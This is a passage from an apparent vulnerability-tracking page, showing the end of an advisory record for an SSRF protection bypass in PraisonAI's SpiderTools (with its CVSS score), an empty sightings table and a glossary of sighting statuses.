"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: SpiderTools redirect-target SSRF protection bypass"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.